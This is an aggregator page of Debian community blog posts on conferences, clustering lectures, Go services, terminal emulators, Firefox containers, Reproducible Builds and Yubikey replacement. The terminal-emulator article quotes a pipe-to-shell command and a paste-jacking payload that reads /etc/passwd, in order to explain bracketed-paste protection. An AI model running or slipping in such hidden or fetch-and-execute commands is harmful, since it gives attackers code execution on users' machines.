You are here

Planet Debian

Subscribe to Feed Planet Debian
Entries tagged english Ben Hutchings's diary of life and technology Reproducible builds blog Google Summer of Code 2018 Intern with Debian Chez Charles Bálint's blog about some of the important things in the Universe ganbatte kudasai! Entries tagged english Dude! Sweet! Entries tagged english Google Summer of Code 2018 Intern with Debian Thoughts about programming, sysadmin, Perl, Debian ... Stuff, Debian, Free Software and Craig jmtd Any sufficiently advanced thinking is indistinguishable from madness As time goes by ... Insider infos, master your Debian/Ubuntu distribution Thinking inside the box Digital-Scurf Ramblings Free Software Hacking Recent content in Debian on /home/athos Reproducible builds blog Thoughts, actions and projects Debian and Free Software sesse's blog Thinking inside the box showing latest 10 pabs Entries tagged english Thinking inside the box Recent content in Gsoc18 on bisco.org I began this blog as part of my homework of Master of Libre Software at URJC. I finished my studies but I keep on writing about free (as in freedom) software, networks and knowledge. Dude! Sweet! Recent content in Debian on Tickets'n'patches Just another WordPress.com weblog anarcat Blog from the Debian Project mejo roaming Entries tagged english anarcat joey Debian and Free Software Reproducible builds blog rebel with rather too many causes Thinking inside the box "Passion and dispassion. Choose two." -- Larry Wall something around Debian, written in funny Eng"r"ish ;)
Përditësimi: 7 months 1 javë më parë

three conferences one week

Sht, 31/03/2018 - 3:52pd

Thought I'd pack my entire year's conference schedule into one week...

First was a Neuroinformatics infrastructure interoperability workshop at McGill, my second trip to Montreal this year. Well outside my wheelhouse, but there's a fair amount of interest in that community in git-annex/datalad. This was a roll with the acronyms, and try to draw parallels to things I know affair. Also excellent sushi and a bonus Secure Scuttlebutt meetup.

Then LibrePlanet. A unique and super special conference, that utterly flew by this year. This is my sixth LibrePlanet and I enjoy it more each time. Hghlights for me were Bassam's photogrammetry workshop, Karen receiving the Free Software award, and Seth's thought-provoking talk on "incompossibilities" especially as applied to social networks. And some epic dinner conversations in central square.

Finally today, a one-day local(!) functional programming(!!) conference in Knoxville TN. Lambda Squared was the best constructed single-track conference I've seen. Starting with an ex-pro-figure skater getting the whole audience to pirouette to capture that uncomfortable out of your element feeling you get learning FP, and ramping gradually past "functional javascript" to orthagonality, contravariant functors, the lambda cube, and constructivist logic.

I notice that I've spent a lot more time in Boston than I ever have in Knoxville -- Cambridge MA is starting to feel like my old haunts, though I've never really lived there. There are not a lot of functional programming conferences in the southeastern USA, and I think this explains how Lambda Squared attracted such a good lineup of speakers. Also Knoxville has a surprisingly large and lively FP community shaping up. There will be another Lambda Squared next year, and this might be a good opportunity to visit with me and go to a FP conference too.

And now time to retreat into my retreaty place for a good long while.

Joey Hess http://joeyh.name/blog/ see shy jo

Cluster analysis lecture notes

Pre, 30/03/2018 - 5:33md

In Winter Term 2017/2018 I was substitute professor at Univeristy Heidelberg, and giving the lecture “Knowledge Discovery in Databases”, i.e., the data mining lecture.

While I won’t make all my slides available, I decided to make the chapter on cluster analysis available. Largely, because there do not appear to be good current books on this topic. Many of the books on data mining barely cover the basics. And I am constantly surprised to see how little people know beyond k-means. But clustering is much broader than k-means!

As I hope to give this lecture frequently at some point, I appreciate feedback to further improve them. This year, I almost completely reworked them, so there are a lot of things to fine tune.

There exist three versions of the slides:

These slides took me about 9 sessions of 90 minutes each.
On one hand, I was not very fast this year, and I probably need to cut down on the extra blackboard material, too. Next time, I would try to use at most 8 sessions for this, to be able to cover other important topics such as outlier detection in more detail, that were a bit too short this time.

I hope the slides will be interesting and useful, and I would appreciate if you give me credit, e.g., by citing my work appropriately.

Erich Schubert https://www.vitavonni.de/blog/ Techblogging

My Laptop

Pre, 30/03/2018 - 10:32pd

My laptop is an old used Samsung R439 that I bought for around Rs 12000/-(USD 185) from a local store when I was in second year in my college. It have a 14” screen, 2GB of RAM, a Pentium p1600 processor, and a 320GB HDD.

Recently it started showing performance issues like loading applications take a while and firefox freezes. I quite fond of this laptop and have some emotional attachment for it. I was reluctant to buy a new one but the same time I need the VT-x (virtualization) feature that my pentium p1600 lacks. So I chose to upgrade it from the ground. The hard part of upgrading is to find a compatible processor for the board. My friend Akhil Varkey whom I met during a Debian packaging session helped me to find a processor that suits my board. I bought the suggested one from Aliexpress, cause I found it cheaply available. I disassembled and installed new processor myself. During disassembling I totally destroyed two screws(stripped) including the holes :(. Now I need to be more careful when carrying laptop around. I already have changed my laptop battery and keyboard couple of months after I bought it. I will be upgrading RAM and hard disk soon.

Abhijith PA http://abhijithpa.me/ Abhijith PA

Rewriting some services in golang

Pre, 30/03/2018 - 9:00pd

The past couple of days I've been reworking a few of my existing projects, and converting them from Perl into Golang.

Bytemark had a great alerting system for routing alerts to different enginners, via email, SMS, and chat-messages. The system is called mauvealert and is available here on github.

The system is built around the notion of alerts which have different states (such as "pending", "raised", or "acknowledged"). Each alert is submitted via a UDP packet getting sent to the server with a bunch of fields:

  • Source IP of the submitter (this is implicit).
  • A human-readable ID such as "heartbeat", "disk-space-/", "disk-space-/root", etc.
  • A raise-field.
  • More fields here ..

Each incoming submission is stored in a database, and events are considered unique based upon the source+ID pair, such that if you see a second submission from the same IP, with the same ID, then any existing details are updated. This update-on-receive behaviour is pretty crucial to the way things work, especially when coupled with the "raise"-field.

A raise field might have values such as:

  • +5m
    • This alert will be raised in 5 minutes.
  • now
    • This alert will be raised immediately.
  • clear
    • This alert will be cleared immediately.

One simple way the system is used is to maintain heartbeat-alerts. Imagine a system sends the following message, every minute:

  • id:heartbeat raise:+5m [source:1.2.3.4]
    • The first time this is received by the server it will be recorded in the database.
    • The next time this is received the existing event will be updated, and crucially the time to raise an alert will be bumped (i.e. it will become current-time + 5m).
    • The next time the update is received the raise-time will also be bumped
    • ..

At some point the submitting system crashes, and five minutes after the last submission the alert moves from "pending" to "raised" - which will make it visible in the web-based user-interface, and also notify an engineer.

With this system you could easily write trivial and stateless ad-hoc monitoring scripts like so which would raise/clear :

curl https://example.com && send-alert --id http-example.com --raise clear --detail "site ok" || \ send-alert --id http-example.com --raise now --detail "site down"

In short mauvealert allows aggregation of events, and centralises how/when engineers are notified. There's the flexibility to look at events, and send them to different people at different times of the day, decide some are urgent and must trigger SMSs, and some are ignorable and just generate emails .

(In mauvealert this routing is done by having a configuration file containing ruby, this attempts to match events so you could do things like say "If the event-id contains "failed-disc" then notify a DC-person, or if the event was raised from $important-system then notify everybody.)

I thought the design was pretty cool, and wanted something similar for myself. My version, which I setup a couple of years ago, was based around HTTP+JSON, rather than UDP-messages, and written in perl:

The advantage of using HTTP+JSON is that writing clients to submit events to the central system could easily and cheaply be done in multiple environments for multiple platforms. I didn't see the need for the efficiency of using binary UDP-based messages for submission, given that I have ~20 servers at the most.

Anyway the point of this blog post is that I've now rewritten my simplified personal-clone as a golang project, which makes deployment much simpler. Events are stored in an SQLite database and when raised they get sent to me via pushover:

The main difference is that I don't allow you to route events to different people, or notify via different mechanisms. Every raised alert gets sent to me, and only me, regardless of time of day. (Albeit via an pluggable external process such that you could add your own local logic.)

I've written too much already, getting sidetracked by explaining how neat mauvealert and by extension purple was, but also I rewrote the Perl DNS-lookup service at https://dns-api.org/ in golang too:

That had a couple of regressions which were soon reported and fixed by a kind contributor (lack of CORS headers, most obviously).

Steve Kemp https://blog.steve.fi/ Steve Kemp's Blog

Debian Policy call for participation -- March 2018

Pre, 30/03/2018 - 2:23pd

We’re getting close to a new release of Policy. Just this week Adam Borowski stepped up to get a patch written for #881431 – thanks for getting things moving along!

Please consider jumping into some of these bugs.

Consensus has been reached and help is needed to write a patch

#823256 Update maintscript arguments with dpkg >= 1.18.5

#833401 virtual packages: dbus-session-bus, dbus-default-session-bus

#835451 Building as root should be discouraged

#838777 Policy 11.8.4 for x-window-manager needs update for freedesktop menus

#845715 Please document that packages are not allowed to write outside thei…

#853779 Clarify requirements about update-rc.d and invoke-rc.d usage in mai…

#874019 Note that the ’-e’ argument to x-terminal-emulator works like ’–’

#874206 allow a trailing comma in package relationship fields

Wording proposed, awaiting review from anyone and/or seconds by DDs

#756835 Extension of the syntax of the Packages-List field.

#786470 [copyright-format] Add an optional “License-Grant” field

#835451 Building as root should be discouraged

#845255 Include best practices for packaging database applications

#846970 Proposal for a Build-Indep-Architecture: control file field

#864615 please update version of posix standard for scripts (section 10.4)

#881431 Clarify a version number is unique field

#892142 update example to use default-mta instead of exim

Merged for the next release (no action needed)

#299007 Transitioning perms of /usr/local

#515856 remove get-orig-source

#742364 Document debian/missing-sources

#886890 Fix for found typos

#888437 Several example scripts are not valid.

#889960 stray line break at clean target in section 4.9

#892142 update example to use default-mta instead of exim

Sean Whitton https://spwhitton.name//blog/ Notes from the Library

A look at terminal emulators, part 1

Pre, 30/03/2018 - 2:00pd

This article is the first in a two-part series about terminal emulators.

Terminals have a special place in computing history, surviving along with the command line in the face of the rising ubiquity of graphical interfaces. Terminal emulators have replaced hardware terminals, which themselves were upgrades from punched cards and toggle-switch inputs. Modern distributions now ship with a surprising variety of terminal emulators. While some people may be happy with the default terminal provided by their desktop environment, others take great pride at using exotic software for running their favorite shell or text editor. But as we'll see in this two-part series, not all terminals are created equal: they vary wildly in terms of functionality, size, and performance.

Some terminals have surprising security vulnerabilities and most have wildly different feature sets, from support for a tabbed interface to scripting. While we have covered terminal emulators in the distant past, this article provides a refresh to help readers determine which terminal they should be running in 2018. This first article compares features, while the second part evaluates performance.

Here are the terminals examined in the series:

Terminal Debian Fedora Upstream Notes Alacritty N/A N/A 6debc4f no releases, Git head GNOME Terminal 3.22.2 3.26.2 3.28.0 uses GTK3, VTE Konsole 16.12.0 17.12.2 17.12.3 uses KDE libraries mlterm 3.5.0 3.7.0 3.8.5 uses VTE, "Multi-lingual terminal" pterm 0.67 0.70 0.70 PuTTY without ssh, uses GTK2 st 0.6 0.7 0.8.1 "simple terminal" Terminator 1.90+bzr-1705 1.91 1.91 uses GTK3, VTE urxvt 9.22 9.22 9.22 main rxvt fork, also known as rxvt-unicode Xfce Terminal 0.8.3 0.8.7 0.8.7.2 uses GTK3, VTE xterm 327 330 331 the original X terminal

Those versions may be behind the latest upstream releases, as I restricted myself to stable software that managed to make it into Debian 9 (stretch) or Fedora 27. One exception to this rule is the Alacritty project, which is a poster child for GPU-accelerated terminals written in a fancy new language (Rust, in this case). I excluded web-based terminals (including those using Electron) because preliminary tests showed rather poor performance.

Unicode support

The first feature I considered is Unicode support. The first test was to display a string that was based on a string from the Wikipedia Unicode page: "é, Δ, Й, ק ,م, ๗,あ,叶, 葉, and 말". This tests whether a terminal can correctly display scripts from all over the world reliably. xterm fails to display the Arabic Mem character in its default configuration:

By default, xterm uses the classic "fixed" font which, according to Wikipedia has "substantial Unicode coverage since 1997". Something is happening here that makes the character display as a box: only by bumping the font size to "Huge" (20 points) is the character finally displayed correctly, and then other characters fail to display correctly:

Those screenshots were generated on Fedora 27 as it gave better results than Debian 9, where some older versions of the terminals (mlterm, namely) would fail to properly fallback across fonts. Thankfully, this seems to have been fixed in later versions.

Now notice the order of the string displayed by xterm: it turns out that Mem and the following character, the Semitic Qoph, are both part of right-to-left (RTL) scripts, so technically, they should be rendered right to left when displayed. Web browsers like Firefox 57 handle this correctly in the above string. A simpler test is the word "Sarah" in Hebrew (שרה). The Wikipedia page about bi-directional text explains that:

Many computer programs fail to display bi-directional text correctly. For example, the Hebrew name Sarah (שרה) is spelled: sin (ש) (which appears rightmost), then resh (ר), and finally heh (ה) (which should appear leftmost).

Many terminals fail this test: Alacritty, VTE-derivatives (GNOME Terminal, Terminator, and XFCE Terminal), urxvt, st, and xterm all show Sarah's name backwards—as if we would display it as "Haras" in English.

The other challenge with bi-directional text is how to align it, especially mixed RTL and left-to-right (LTR) text. RTL scripts should start from the right side of the terminal, but what should happen in a terminal where the prompt is in English, on the left? Most terminals do not make special provisions and align all of the text on the left, including Konsole, which otherwise displays Sarah's name in the right order. Here, pterm and mlterm seem to be sticking to the standard a little more closely and align the test string on the right.

Paste protection

The next critical feature I have identified is paste protection. While it is widely known that incantations like:

$ curl http://example.com/ | sh

are arbitrary code execution vectors, a less well-known vulnerability is that hidden commands can sneak into copy-pasted text from a web browser, even after careful review. Jann Horn's test site brilliantly shows how the apparently innocuous command: git clone git://git.kernel.org/pub/scm/utils/kup/kup.git

gets turned into this nasty mess (reformatted a bit for easier reading) when pasted from Horn's site into a terminal:

git clone /dev/null; clear; echo -n "Hello "; whoami|tr -d '\n'; echo -e '!\nThat was a bad idea. Don'"'"'t copy code from websites you don'"'"'t trust! \ Here'"'"'s the first line of your /etc/passwd: '; head -n1 /etc/passwd git clone git://git.kernel.org/pub/scm/utils/kup/kup.git

This works by hiding the evil code in a <span> block that's moved out of the viewport using CSS.

Bracketed paste mode is explicitly designed to neutralize this attack. In this mode, terminals wrap pasted text in a pair of special escape sequences to inform the shell of that text's origin. The shell can then ignore special editing characters found in the pasted text. Terminals going all the way back to the venerable xterm have supported this feature, but bracketed paste also needs support from the shell or application running on the terminal. For example, software using GNU Readline (e.g. Bash) needs the following in the ~/.inputrc file:

set enable-bracketed-paste on

Unfortunately, Horn's test page also shows how to bypass this protection, by including the end-of-pasted-text sequence in the pasted text itself, thus ending the bracketed mode prematurely. This works because some terminals do not properly filter escape sequences before adding their own. For example, in my tests, Konsole fails to properly escape the second test, even with .inputrc properly configured. That means it is easy to end up with a broken configuration, either due to an unsupported application or misconfigured shell. This is particularly likely when logged on to remote servers where carefully crafted configuration files may be less common, especially if you operate many different machines.

A good solution to this problem is the confirm-paste plugin of the urxvt terminal, which simply prompts before allowing any paste with a newline character. I haven't found another terminal with such definitive protection against the attack described by Horn.

Tabs and profiles

A popular feature is support for a tabbed interface, which we'll define broadly as a single terminal window holding multiple terminals. This feature varies across terminals: while traditional terminals like xterm do not support tabs at all, more modern implementations like Xfce Terminal, GNOME Terminal, and Konsole all have tab support. Urxvt also features tab support through a plugin. But in terms of tab support, Terminator takes the prize: not only does it support tabs, but it can also tile terminals in arbitrary patterns (as seen at the right).

Another feature of Terminator is the capability to "group" those tabs together and to send the same keystrokes to a set of terminals all at once, which provides a crude way to do mass operations on multiple servers simultaneously. A similar feature is also implemented in Konsole. Third-party software like Cluster SSH, xlax, or tmux must be used to have this functionality in other terminals.

Tabs work especially well with the notion of "profiles": for example, you may have one tab for your email, another for chat, and so on. This is well supported by Konsole and GNOME Terminal; both allow each tab to automatically start a profile. Terminator, on the other hand, supports profiles, but I could not find a way to have specific tabs automatically start a given program. Other terminals do not have the concept of "profiles" at all.

Eye candy

The last feature I considered is the terminal's look and feel. For example, GNOME, Xfce, and urxvt support transparency, background colors, and background images. Terminator also supports transparency, but recently dropped support for background images, which made some people switch away to another tiling terminal, Tilix. I am personally happy with only a Xresources file setting a basic color set (Solarized) for urxvt. Such non-standard color themes can create problems however. Solarized, for example, breaks with color-using applications such as htop and IPTraf.

While the original VT100 terminal did not support colors, newer terminals usually did, but were often limited to a 256-color palette. For power users styling their terminals, shell prompts, or status bars in more elaborate ways, this can be a frustrating limitation. A Gist keeps track of which terminals have "true color" support. My tests also confirm that st, Alacritty, and the VTE-derived terminals I tested have excellent true color support. Other terminals, however, do not fare so well and actually fail to display even 256 colors. You can see below the difference between true color support in GNOME Terminal, st, and xterm, which still does a decent job at approximating the colors using its 256-color palette. Urxvt not only fails the test but even shows blinking characters instead of colors.

Some terminals also parse the text for URL patterns to make them clickable. This is the case for all VTE-derived terminals, while urxvt requires the matcher plugin to visit URLs through a mouse click or keyboard shortcut. Other terminals reviewed do not display URLs in any special way.

Finally, a new trend treats scrollback buffers as an optional feature. For example, st has no scrollback buffer at all, pointing people toward terminal multiplexers like tmux and GNU Screen in its FAQ. Alacritty also lacks scrollback buffers but will add support soon because there was "so much pushback on the scrollback support". Apart from those outliers, every terminal I could find supports scrollback buffers.

Preliminary conclusions

In the next article, we'll compare performance characteristics like memory usage, speed, and latency of the terminals. But we can already see that some terminals have serious drawbacks. For example, users dealing with RTL scripts on a regular basis may be interested in mlterm and pterm, as they seem to have better support for those scripts. Konsole gets away with a good score here as well. Users who do not normally work with RTL scripts will also be happy with the other terminal choices.

In terms of paste protection, urxvt stands alone above the rest with its special feature, which I find particularly convenient. Those looking for all the bells and whistles will probably head toward terminals like Konsole. Finally, it should be noted that the VTE library provides an excellent basis for terminals to provide true color support, URL detection, and so on. So at first glance, the default terminal provided by your favorite desktop environment might just fit the bill, but we'll reserve judgment until our look at performance in the next article.

This article first appeared in the Linux Weekly News.

Antoine Beaupré https://anarc.at/tag/debian-planet/ pages tagged debian-planet

The subjectification of a racial group

Pre, 30/03/2018 - 12:13pd

In the philosophy department the other day we were discussing race-based sexual preferences. As well as considering the cases in which this is ethically problematic, we were trying to determine cases in which it might be okay.

A colleague suggested that a preference with the following history would not be problematic. There is a culture with which he feels a strong affiliation, having spent time living in this culture and having a keen interest in various aspects of that culture, such as its food. As a result, he is more likely, on average, to find himself sexually attracted to someone from that culture—he shares something with them. And since almost all members of that culture are of a particular racial group, that means he is more likely to find himself sexually attracted to someone of that race than to other races, ceteris paribis.

The cultural affiliation is something good. The sexual preference is then an ethically neutral side effect of that affiliation. My colleague suggested a name for the process which is responsible for the preference: he has subjectified his relationship with the culture. Instead of objectifying members of that group, as happens with problematic race-based sexual preferences, he has done something which counts as the opposite.

I am interested in thinking more about the idea of subjectification.

Sean Whitton https://spwhitton.name//blog/ Notes from the Library

Starting the Ayatana Indicators Transition in Debian

Enj, 29/03/2018 - 3:03md

This is to make people aware and inform about an ongoing effort to replace Indicators in Debian (most people know the concept from Ubuntu) by a more generically developed and actively maintained fork: Ayatana Indicators.

TL;DR;

In Debian, we will soon start sending out patches to SNI supporting applications via Debian's BTS (and upstream trackers, too, probably), that make the shift from Ubuntu AppIndicator (badly maintained in Debian) to Ayatana AppIndicator.

Status of the work being done is documented here: https://wiki.debian.org/Ayatana/IndicatorsTransition

Why Ayatana Indicators

The fork is currently pushed forward by the Debian and Ubuntu MATE packaging team.

The Indicators concept has originally been documented by Canonical, find your entry point in the readings here [1,2].

Some great work and achievement was done around Ubuntu Indicators by Canonical Ltd. and the Indicators concept has always been a special identifying feature of Ubuntu. Now with the switch to GNOMEv3, the future of Indicators in Ubuntu is uncertain. This is where Ayatana Indicators come in...

The main problem with Ubuntu Indicators today (and ever since) is (has been): they only work properly on Ubuntu, mostly because of one Ubuntu-specific patch against GTK-3 [3].

In Ayatana Indicators (speaking with my upstream hat on now), we are currently working on a re-implementation of the rendering part of the indicators (using GTK's popovers rather then menushells), so that it works on vanilla GTK-3. Help from GTK-3 developers is highly welcome, in case you feel like chiming in.

Furthermore, the various indicator icons in Ubuntu (-session, -power, -sound, etc. - see below for more info) have been targetted more and more for sole usage with the Unity 7 and 8 desktop environments. They can be used with other desktop environments, but are likely to behave quite agnostic (and sometimes stupid) there.

In Ayatana Indicators, we are working on generalizing the functionality of those indicator icon applications and make them more gnostic on other desktop environments.

Ayatana Indicators as an upstream project will be very open to contributions from other desktop environment developers that want to utilize the indicator icons with their desktop shell, but need adaptations for their environment. Furthermore, we want to encourage Unity 7 and Unity 8 developers to consider switching over (and getting one step further with the goal of shipping Unity on non-Ubuntu systems). With the Unity 8 maintainers (the people from UBports / Ubuntu Touch) first discussion exchanges have taken place.

The different Components of Ayatana Indicators The 'indicator-renderer' Applets

Theses are panel plugins mostly, that render the system tray icons and menus (and widgets) defined by indicator aware applications. They normally come with your desktop environment (if it supports indicators).

Letting the desktop environment render the system tray itself assures that the indicator icons (i.e. the desktop system tray) looks just like the rest of the desktop shell. With the classical (xembed based) system tray (or notification) areas, all applications render their icon and menus themselves, which can cause theming problems and a11y issues and more.

Examples of indicator renderers are: mate-indicator-applet, budgie-indicator-applet, xfce4-indicator-pluign, etc.

Shared Library: Rendering and Loading of Indicators

The Ayatana Indicators project currently only provides a rendering shared lib for GTK-2 and GTK-3 based applications. We still need to connect better with the Qt-world.

The rendering library (used by the above renderers) is libayatana-indicator.

This library supports:

  • loading and rendering of old style indicators
  • loading and rendering of NG indicators

The libayatana-indicator library also utilizes a variety of versatile GTK-3 widget defined in another shared library: aytana-ido.

Ayatana Indicator Applets

The Ayatana Indicators project continues and generalizes various indicator icon applications that are not applications by themselves really, but more like system / desktop control elements:

  • ayatana-indicator-session (logout, lock screen, user guides, etc.)
  • ayatana-indicator-power (power management)
  • ayatana-indicator-sound (sound and multimedia control)
  • ayatana-indicator-datetime (clock, calendar, evolution-data-server integration)
  • ayatana-indicator-notifications (libnotify collector of system messages)
  • ayatana-indicator-printers (interact with CUPS print jobs and queues)

These indicators are currently under heavy re-development. The current effort in Ayatana Indicators is to make them far more generic and usable on all desktop environments that want to support them. E.g. we recently added XFCE awareness to the -session and the -power indicator icons.

One special indicator icon is the Ayatana Indicator Application indicator. It provides SNI support to third-party applications (see below). For the desktop applet, it appears just like any of the other above named indicators, but it opens the door to the world of SNI supporting applications.

One available and easy-to-install test case in Debian buster for indicator icons provided by the Ayatana Indicators project is the arctica-greeter package. The icons displayed in the greeter are Ayatana Indicators.

Ayatana AppIndicator API

The Ayatana AppIndicator API is just one way of talking to an SNI DBus service. The implementation is done in the shared lib 'libayatana-appindicator'. This library provides an easy to implement API that allows GTK-2/3 applications to create an indicator icon in a panel with an indicator renderer added.

In the application, the developer creates a generic menu structure and defines one or more icons for the system tray (more than one icon: only one icon is shown (plus some text, if needed), but that icon may changed based on the applet's status). This generic menu is sent to a DBus interface (org.kde.StatusNotifier). Sometimes, people say, that such applications have SNI support (StatusNotifier Interface support).

The Ayatana Indicators project offers Ayatana AppIndicator to GTK-3 developers (and GTK-2, but well...). Canonical implemented bindings for Python2, Perl, GIR, Mono/CLI and we continue to support these as long as it makes sense.

The nice part of Ayatana AppIndicator shared library is: if a desktop shell does not offer the SNI service, then it tries to fall back to the xembed-way of adding system tray icons to your panel / status bar.

In Debian, we will start sending out patches too SNI supporting applications soon, that make the shift from Ubuntu AppIndicator (badly maintained in Debian) to Ayatana AppIndicator. The cool part of this is, you can convert your GTK-3 application from Ubuntu AppIndicator to Ayatana AppIndicator and use it on top of any(!) SNI implementation, be it an applet based on Ubuntu Indicators, based on Ayatana Indicators or some other implementation, like the vala-sntray-applet or SNI support in KDE.

Further Readings

Some more URLs for deeper reading...

You can also find more info on my blog: https://sunweavers.net

References sunweaver http://sunweavers.net/blog/blog/1 sunweaver's blog

food, consumer experience and Joshi Wadewala

Enj, 29/03/2018 - 9:29pd

For a while now, I have been looking at various options of how food quality experience is checked by various people. The only proper or official authority is FSSAI but according to CAG and quartz own web report FSSAI has to go a long way.

The reasons I share this is over the years I have mentioned about how Joshi Wadewala has managed to outdo what others could also have done. But lately, it seems the staff and the owners have grown lax and arrogant about the quality of food and service they provide. For instance under FSSAI it is written under labeling –

Labelling

It is mandatory that every package of food intended for sale should carry a label that bears all the information required under FSS (Packaging and Labelling) Regulation, 2011. Food package must carry a Label with the following information :

Common name of the Product.
Name and address of the product’s Manufacturer
Date of Manufacture
Ingredient List with additives
Nutrition Facts
Best before/ Expires on
Net contents in terms of weight, measure or count.
Packing codes/Batch number
Declaration regarding vegetarian or non-vegetarian
Country of origin for imported food

Also many a times their fresh food is either not fresh or not cooked properly. This has been happening for couple of weeks now. I have to point out that they are not the only ones although this is a proper shop, not a pavement dweller per-se.

I did file my concern with FSSAI but I highly doubt any action will be taken although it is a public safety issue, health issue but as biggies are never caught then he’s a smallish-time operator.

It is also a concern as my mother has no teeth and I was diagnosed with convulsive seizures last year which prevented me from attending debconf last year. I was in hospital for a period of 3 months.

I have stopped going to the establishment as there are others who are better at receiving feedback and strive to being better.

Disclaimer – All the photos shared are copyright zomato.com

I have also no idea if GST is paid or not as you do not get any receipts for your purchases which is also one of the basic consumer right. They just have one slip which you get when you do your purchase and have to hand it over for either take-away or getting food.

They do have a bill book but that is for bulk purchases only.

shirishag75 https://flossexperiences.wordpress.com #planet-debian – Experiences in the community

Limit personal data exposure with Firefox containers

Mër, 28/03/2018 - 8:44md

There was some noise recently about the massive amount of data gathered by Cambridge Analytica from Facebook users. While I don't use Facebook myself, I do use Google and other services which are known to gather a massive amount of data, and I obviously know a lot of people using those services. I also saw some posts or tweet threads about the data collection those services do.

Mozilla recently released a Firefox extension to help users confine Facebook data collection. This addon is actually based on the containers technology Mozilla develops since few years. It started as an experimental feature in Nightly, then as a test pilot experiment, and finally evolved into a fully featured extension called Multi-Account containers. A somehow restricted version of this is even included directly in Firefox but you don't have the configuration window without the extension and you need to configure it manually with about:config.

Basically, containers separate storage (cookies, site preference, login session etc.) and enable an user to isolate various aspect of their online life by only staying logged to specific websites in their respective containers. In a way it looks like having a separate Firefox profile per website, but it's a lot more usable daily.

I use this extension massively, in order to isolate each website. I have one container for Google, one for Twitter, one for banking etc. If I used Facebook, I would have a Facebook container, if I used gmail I would have a gmail container. Then, my day to day browsing is done using the “default” container, where I'm not logged to any website, so tracking is minimal (I also use uBlock origin to reduce ads and tracking).

That way, my online life is compartmentalized/containerized and Google doesn't always associate my web searches to my account (I actually usually use DuckDuckGo but sometimes I do a Google search), Twitter only knows about the tweets I read and I don't expose all my cookies to every website.

The extension and support pages are really helpful to get started, but basically:

  • you install the extension from the extension page
  • you create new containers for the various websites you want using the menu
  • when you open a new tab you can opt to open it in a selected container by long pressing on the + button
  • the current container is shown in the URL bar and with a color underline on the current tab
  • it's also optionally possible to assign a website to a container (for example, always open facebook.com in the Facebook container), which can help restricting data exposure but might prevent you browsing that site unidentified

When you're inside the container and you want to follow a link, you can get out of the container by right clicking on the link, select “Open link in new container tab” then select “no container”. That way Facebook won't follow you on that website and you'll start fresh (after the redirection).

As far as I can tell it's not yet possible to have disposable containers (which would be trashed after you close the tab) but a feature request is open and another extension seems to exist.

In the end, and while the isolation from that extension is not perfect, I really suggest Firefox users to give it a try. In my opinion it's really easy to use and really helps maintaining healthy barriers on one's online presence. I don't know about an equivalent system for Chromium (or Safari) users but if you know about it feel free to point it to me.

A French version of this post is also available here just in case.

Yves-Alexis corsac@debian.org Corsac.net - Debian

Reproducible Builds: Weekly report #152

Mar, 27/03/2018 - 11:33md

Here's what happened in the Reproducible Builds effort between Sunday March 18 and Saturday March 24 2018:

Packages reviewed and fixed, and bugs filed diffoscope development

diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This week, version 92 was uploaded to unstable by Chris Lamb. It included contributions already covered by posts in previous weeks as well as new ones from:

reprotest development

reprotest is our tool to build software and check it for reproducibility.

trydiffoscope development

trydiffoscope is a lightweight command-line tool to the try.diffoscope.org web-based version of diffoscope.

Reviews of unreproducible packages

88 package reviews have been added, 109 have been updated and 18 have been removed in this week, adding to our knowledge about identified issues.

A random_order_in_javahelper_manifest_files toolchain issue was added by Chris Lamb and the timestamps_in_pdf_generated_by_inkscape toolchain issue was also updated with a URI to the upstream discussion.

Weekly QA work

During our reproducibility testing, FTBFS bugs have been detected and reported by:

  • Adrian Bunk (66)
  • Jeremy Bicha (1)
  • Michael Olbrich (1)
  • Ole Streicher (1)
  • Sebastien KALT (1)
  • Thorsten Glaser (1)
Misc.

This week's edition was written by Bernhard M. Wiedemann, Chris Lamb & Holger Levsen & reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

Reproducible builds folks https://reproducible.alioth.debian.org/blog/ Reproducible builds blog

Replacing a lost Yubikey

Mër, 14/03/2018 - 7:05pd

Some weeks ago I lost my purse with everything in there, from residency card, driving license, credit cards, cash cards, all kind of ID cards, and last but not least my Yubikey NEO. Being Japan I did expect that the purse will show up in a few days, most probably the money gone but all the cards intact. Unfortunately not this time. So after having finally reissued most of the cards, I also took the necessary procedures concerning the Yubikey, which contained my GnuPG subkeys, and was used as second factor for several services (see here and here).

Although the GnuPG keys on the Yubikey are considered safe from extraction, I still decided to revoke them and create new subkeys – one of the big advantage of subkeys, one does not start at zero but just creates new subkeys instead of running around trying to get signatures again.

Other things that have to be made is removing the old Yubikey from all the services where it has been used as second factor. In my case that were quite a lot (Google, Github, Dropbox, NextCloud, WordPress, …). BTW, you have a set of backup keys saved somewhere for all the services you are using, right? It helps a lot getting into the system.

GnuPG keys renewal

To remind myself of what is necessary, here are the steps:

  • Get your master key from the backup USB stick
  • revoke the three subkeys that are on the Yubikey
  • create new subkeys
  • install the new subkeys onto a new Yubikey, update keyservers

All of that is quite straight-forward: Use gpg --expert --edit-key YOUR_KEY_ID, after this you select the subkey with key N, followed by a revkey. You can select all three subkeys and revoke them at the same time: just type key N for each of the subkeys (where N is the index starting from 0 of the key).

Next create new subkeys, here you can follow the steps laid out in the original blog. In the same way you can move them to a new Yubikey Neo (good that I bought three of them back then!).

Last but not least you have to update the key-servers with your new public key, which is normally done with gpg --send-keys (again see the original blog).

The most tricky part was setting up and distributing the keys on my various computers: The master key remains as usual on offline media only. On my main desktop at home I have the subkeys available, while on my laptop I only have stubs pointing at the Yubikey. This needs a bit of shuffling around, but should be obvious somehow when looking at the previous blogs.

Full disk encryption

I had my Yubikey also registered as unlock device for the LUKS based full disk encryption. The status before the update was as follows:

$ cryptsetup luksDump /dev/sdaN Version: 1 Cipher name: aes .... Key Slot 0: ENABLED ... Key Slot 1: DISABLED Key Slot 2: DISABLED Key Slot 3: DISABLED Key Slot 4: DISABLED Key Slot 5: DISABLED Key Slot 6: DISABLED Key Slot 7: ENABLED ...

I was pretty sure that the Slot for the old Yubikey was Slot 7, but I wasn’t sure. So I first registered the new Yubikey in slot 6 with

yubikey-luks-enroll -s 6 -d /dev/sdaN

and checked that I can unlock during boot using the new Yubikey. Then I cleared the slot information in slot 7 with

cryptsetup luksKillSlot /dev/sdaN 7

and again made sure that I can boot using my passphrase (in slot 0) and the new Yubikey (in slot6).

TOTP/U2F second factor authentication

The last step was re-registering the new Yubikey with all the favorite services as second factor, removing the old key on the way. In my case the list comprises several WordPress sites, GitHub, Google, NextCloud, Dropbox and what else I have forgotten.

